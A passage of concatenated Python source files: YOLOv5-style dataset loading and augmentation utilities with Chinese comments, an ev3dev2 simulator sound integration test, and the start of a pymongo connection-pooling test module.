ne += ne_f
nc += nc_f
if im_file:
# store the labels, image shape and segments for this image
x[im_file] = [l, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if msgs:
logging.info('\n'.join(msgs))
if nf == 0:
logging.info(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
# add bookkeeping info to the cache
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, len(self.img_files)
x['msgs'] = msgs # warnings
x['version'] = 0.4 # cache version
try:
# save the cache
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
logging.info(f'{prefix}New cache created: {path}')
except Exception as e:
logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # path not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
# hyperparameters
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
# load the sample with mosaic augmentation
img, labels = load_mosaic(self, index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))
else:
# Load image
# load the image and resize it by the ratio of the target size to the original size (no padding yet)
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
# for rectangular training, use the per-batch input shape
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
# letterbox resizes and pads the image to `shape`, returning the image, the scale ratio and the padding;
# without rectangular training this simply pads to a square of img_size
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
# shift the boxes by the padding and convert normalized xywh to pixel xyxy
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# random rotation, translation, scaling, shearing and perspective transform
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
# convert the boxes back from pixel xyxy to normalized xywh
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
# apply albumentations augmentation
img, labels = self.albumentations(img, labels)
# HSV color-space
# randomly jitter hue (H), saturation (S) and value (V)
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
# random vertical flip
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
# random horizontal flip
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
# column 0 is reserved for the image index within the batch, filled in later by collate_fn
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
"""
pytorch的DataLoader打包一个batch的数据集时要经过此函数进行打包
通过重写此函数实现标签与图片对应的划分,一个batch中哪些标签属于哪一张图片,形如
[[0, 6, 0.5, 0.5, 0.26, 0.35],
[0, 6, 0.5, 0.5, 0.26, 0.35],
[1, 6, 0.5, 0.5, 0.26, 0.35],
[2, 6, 0.5, 0.5, 0.26, 0.35],]
前两行标签属于第一张图片,第三行属于第二张。。。
"""
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
"""将一个batch的图片每四张处理,
0.5的概率将四张图片拼接到一张大图上训练,
0.5概率直接将某张图片上采样两倍训练"""
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
# label offsets relative to the tiled image
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
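# Hedged illustration (added, not part of the original source): after collate_fn,
# column 0 of the concatenated label tensor holds the index of the image each box
# belongs to, which is how build_targets later matches boxes to images. The
# tensors below are tiny synthetic stand-ins for real dataset items.
def _example_collate_fn():
    item0 = (torch.zeros(3, 64, 64),
             torch.tensor([[0., 6, .5, .5, .26, .35],
                           [0., 6, .5, .5, .26, .35]]), 'a.jpg', None)
    item1 = (torch.zeros(3, 64, 64),
             torch.tensor([[0., 6, .5, .5, .26, .35]]), 'b.jpg', None)
    imgs, labels, paths, shapes = LoadImagesAndLabels.collate_fn([item0, item1])
    # imgs.shape == (2, 3, 64, 64); labels[:, 0] == tensor([0., 0., 1.])
    return imgs, labels, paths, shapes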
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
"""读取图片和长宽, 并保持长宽比resize到input-size"""
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
npy = self.img_npy[i]
if npy and npy.exists(): # load npy
im = np.load(npy)
else: # read image
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, 'Image Not Found ' + path
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
# choose the interpolation method based on the resize ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
def load_mosaic(self, index):
"""mosaic数据增强,拼接四张图"""
# loads images in a 4-mosaic
global img4, y1a, y2a, x1a, x2a, y1b, y2b, x1b, x2b
labels4, segments4 = [], []
s = self.img_size
# pick a random mosaic center
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
# pick three additional random image indices
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img within img4 (the 2s x 2s mosaic canvas)
if i == 0: # top left
# initialize the mosaic canvas
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
# position: top left
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
# position: top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
# position: bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
# position: bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
# paste the cropped region of the small image onto the mosaic canvas
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
# offsets from the small image to the canvas, used to remap the label boxes
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
# remap the label boxes onto the mosaic canvas
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
# clip the boxes to the canvas
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
# copy-paste augmentation
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
# after tiling, the mosaic canvas has shape [2*img_size, 2*img_size];
# random_perspective rotates, translates, scales, shears and warps it, then crops back to img_size
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
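# Hedged sketch (added, not part of the original source): the padw/padh values in
# load_mosaic are the translation from each source tile's coordinate frame to the
# 2s x 2s mosaic canvas, which is why xywhn2xyxy can remap the normalized labels
# directly. Minimal restatement of that remapping for a single tile:
def _example_mosaic_label_offset(labels_xywhn, w, h, x1a, y1a, x1b, y1b):
    padw, padh = x1a - x1b, y1a - y1b  # canvas position minus source crop origin
    return xywhn2xyxy(labels_xywhn, w, h, padw, padh)  # pixel xyxy on the canvas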
def load_mosaic9(self, index):
"""功能同上,只不过拼接9张图"""
# loads images in a 9-mosaic
global wp, w0, hp, c, h0, img9
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9 (a 3x3 grid)
'''
Build a 3x3 grid with image 0 at the center and the other tiles
placed around it in order, laid out as:
8 1 2
7 0 3
6 5 4
'''
# set the tile position
if i == 0: # center of the 3x3 grid
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
# x and y offsets of this tile
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
# crop/warp the stitched image with a random perspective transform
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def create_folder(path='./new'):
"""创建文件夹"""
# Create folder
# remove the folder first if it already exists
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
"""通过将所有文件置于顶层来展平递归目录"""
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
"""将检测数据集转换为分类数据集,每个类有一个目录"""
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
"""将数据集自动拆分为train/val/test拆分并保存path/Autosplit.*.txt文件"""
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in IMG_FORMATS], []) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
# the three split txt files
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
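# Hedged usage sketch (added, not part of the original source): autosplit writes
# autosplit_train.txt / autosplit_val.txt / autosplit_test.txt next to the images
# directory, each listing relative image paths. Example call with an assumed
# coco128 layout:
def _example_autosplit():
    autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0),
              annotated_only=True)  # keep only images that have a label .txt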
def verify_image_label(args):
"""验证一个图像标签对"""
# Verify one image-label pair
im_file, lb_file, prefix = args
# counts of missing, found, empty and corrupt labels
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, corrupt
# this function handles one pair at a time; the caller accumulates the counts, so each flag below is only ever set to 1
try:
# verify images
# open the image with PIL and verify it
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
# check that both image dimensions are at least 10 pixels
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
# check that the image format is one of IMG_FORMATS
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
# check JPEG files for truncation
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
assert f.read() == b'\xff\xd9', 'corrupted JPEG'
# verify labels
segments = [] # instance segments
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file, 'r') as f:
# read the label file
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
# if any row has more than 8 values, the label stores segment polygon points
if any([len(x) > 8 for x in l]): # is segment
# class ids
classes = np.array([x[0] for x in l], dtype=np.float32)
# segments can have different lengths, so they are kept in a list
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
# convert segments to boxes to form the new labels
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
# each label row must have 5 columns
assert l.shape[1] == 5, 'labels require 5 columns each'
# all label values must be >= 0
assert (l >= 0).all(), 'negative labels'
# x, y, w, h must be normalized to [0, 1]
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
# there must be no duplicate label rows
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
# an empty label file: set ne = 1
ne = 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
# no label file: set nm = 1
nm = 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
return im_file, l, shape, segments, nm, nf, ne, nc, ''
except Exception as e:
# an exception was caught: set nc = 1
nc = 1
msg = f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
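# Hedged illustration (added, not part of the original source): the label files
# checked above are plain text with one object per row, either
# "class x_center y_center width height" (five normalized values) or a class id
# followed by polygon points that segments2boxes collapses into a box. A minimal
# well-formed label file could be written like this (the values are made up):
def _example_write_label(lb_file='000000000009.txt'):
    with open(lb_file, 'w') as f:
        f.write('45 0.479492 0.688771 0.955609 0.595500\n')  # cls x y w h in [0, 1]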
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
"""返回数据集统计dict,其中包含每个类的每个分割的图像和实例计数"""
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
verbose: Print stats dictionary
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *[round(x, 4) for x in points]] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
assert os.system(f'unzip -q {path} -d {path.parent}') == 0, f'Error unzipping {path}'
dir = path.with_suffix('') # dataset directory
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f'
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(im_dir / Path(f).name, quality=75) # save
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_file(yaml_path), encoding='ascii', errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.img_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file, 'r') as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
sound_integration_test.py
|
import os
import sys
import threading
import unittest
from multiprocessing import Process
from time import sleep
import ev3dev2simulator.config.config as config
from unittest.mock import patch, MagicMock
from ev3dev2.sound import Sound
from ev3dev2.motor import MoveTank, OUTPUT_A, OUTPUT_D, SpeedPercent
from ev3dev2simulator import __main__
class TestConfig(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
sim = Process(target=__main__.main, daemon=True)
sim.start()
sleep(4)
def test_beep(self):
print('Should beep 4 times, waits before driving')
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.beep()
sleep(1)
print('Should beep 4 times, sound plays during driving')
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
flip = 1
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.beep(play_type=Sound.PLAY_NO_WAIT_FOR_COMPLETE)
sleep(3)
def test_speak(self):
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.speak("tests tests tests tests")
sleep(3)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.speak("tests tests tests tests", play_type=Sound.PLAY_NO_WAIT_FOR_COMPLETE)
sleep(3)
def test_play_tone(self):
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_tone(500, duration=2, volume=50, play_type=1)
sleep(3)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_tone(500, duration=2, volume=50, play_type=0)
sleep(3)
def test_tone(self):
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.tone([
(392, 350, 100), (492, 350), (292,), ()
])
sleep(3)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.tone([
(392, 350, 100), (492, 350), (292,), ()
], play_type=Sound.PLAY_NO_WAIT_FOR_COMPLETE)
sleep(3)
def test_play_note(self):
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_note("C4", 0.5)
sleep(3)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_note("C4", 0.5, play_type=Sound.PLAY_NO_WAIT_FOR_COMPLETE)
sleep(3)
def skip_test_play_file(self):
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(2):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_file('inputFiles/bark.wav')
sleep(3)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_file('inputFiles/bark.wav', play_type=Sound.PLAY_NO_WAIT_FOR_COMPLETE)
sleep(3)
def test_play_song(self):
s = Sound()
s.play_song((
('D4', 'e3'), # intro anacrusis
('D4', 'e3'),
('D4', 'e3'),
('G4', 'h'), # meas 1
('D5', 'h'),
('C5', 'e3'), # meas 2
('B4', 'e3'),
('A4', 'e3'),
('G5', 'h'),
('D5', 'q'),
('C5', 'e3'), # meas 3
('B4', 'e3'),
('A4', 'e3'),
('G5', 'h'),
('D5', 'q'),
('C5', 'e3'), # meas 4
['B4', 'e3'],
('C5', 'e3'),
('A4', 'h.'),
))
if __name__ == '__main__':
unittest.main()
|
test_pooling_base.py
|
# Copyright 2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base classes to test built-in connection-pooling with threads or greenlets.
"""
import gc
import random
import socket
import sys
import thread
import threading
import time
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
import pymongo.pool
from pymongo.connection import Connection
from pymongo.pool import (
Pool, GreenletPool, NO_REQUEST, NO_SOCKET_YET, SocketInfo)
from pymongo.errors import ConfigurationError
from test import version
from test.test_connection import get_connection, host, port
from test.utils import delay, is_mongos
N = 50
DB = "pymongo-pooling-tests"
if sys.version_info[0] >= 3:
from imp import reload
try:
import gevent
from gevent import Greenlet, monkey, hub
import gevent.coros, gevent.event
has_gevent = True
except ImportError:
has_gevent = False
def one(s):
"""Get one element of a set"""
return iter(s).next()
class MongoThread(object):
"""A thread, or a greenlet, that uses a Connection"""
def __init__(self, test_case):
self.use_greenlets = test_case.use_greenlets
self.connection = test_case.c
self.db = self.connection[DB]
self.ut = test_case
self.passed = False
def start(self):
if self.use_greenlets:
# A Gevent extended Greenlet
self.thread = Greenlet(self.run)
else:
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True) # Don't hang whole test if thread hangs
self.thread.start()
def join(self):
self.thread.join(300)
if self.use_greenlets:
assert self.thread.dead, "Greenlet timeout"
else:
assert not self.thread.isAlive(), "Thread timeout"
self.thread = None
def run(self):
self.run_mongo_thread()
# No exceptions thrown
self.passed = True
def run_mongo_thread(self):
raise NotImplementedError()
class SaveAndFind(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
rand = random.randint(0, N)
_id = self.db.sf.save({"x": rand}, safe=True)
self.ut.assertEqual(rand, self.db.sf.find_one(_id)["x"])
class Unique(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.connection.start_request()
self.db.unique.insert({})
self.ut.assertEqual(None, self.db.error())
self.connection.end_request()
class NonUnique(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.connection.start_request()
self.db.unique.insert({"_id": "jesse"})
self.ut.assertNotEqual(None, self.db.error())
self.connection.end_request()
class Disconnect(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.connection.disconnect()
class NoRequest(MongoThread):
def run_mongo_thread(self):
self.connection.start_request()
errors = 0
for _ in xrange(N):
self.db.unique.insert({"_id": "jesse"})
if not self.db.error():
errors += 1
self.connection.end_request()
self.ut.assertEqual(0, errors)
def run_cases(ut, cases):
threads = []
nruns = 10
if (
ut.use_greenlets and sys.platform == 'darwin'
and gevent.version_info[0] < 1
):
# Gevent 0.13.6 bug on Mac, Greenlet.join() hangs if more than
# about 35 Greenlets share a Connection. Apparently fixed in
# recent Gevent development.
nruns = 5
for case in cases:
for i in range(nruns):
t = case(ut)
t.start()
threads.append(t)
for t in threads:
t.join()
for t in threads:
assert t.passed, "%s.run_mongo_thread() threw an exception" % repr(t)
class OneOp(MongoThread):
def __init__(self, ut):
